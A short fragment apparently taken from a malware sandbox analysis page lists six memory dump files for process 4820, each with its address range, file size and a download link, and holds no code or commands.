          • memory/4820-8-0x0000000005650000-0x00000000056B6000-memory.dmp

            Filesize

            408KB

            Download

          • memory/4820-7-0x00000000053B0000-0x00000000053D2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4820-6-0x00000000056C0000-0x0000000005CE8000-memory.dmp

            Filesize

            6.2MB

            Download

          • memory/4820-5-0x0000000074A50000-0x0000000075200000-memory.dmp

            Filesize

            7.7MB

            Download

          • memory/4820-4-0x0000000002B40000-0x0000000002B76000-memory.dmp

            Filesize

            216KB

            Download

          • memory/4820-3-0x0000000074A5E000-0x0000000074A5F000-memory.dmp

            Filesize

            4KB

            Download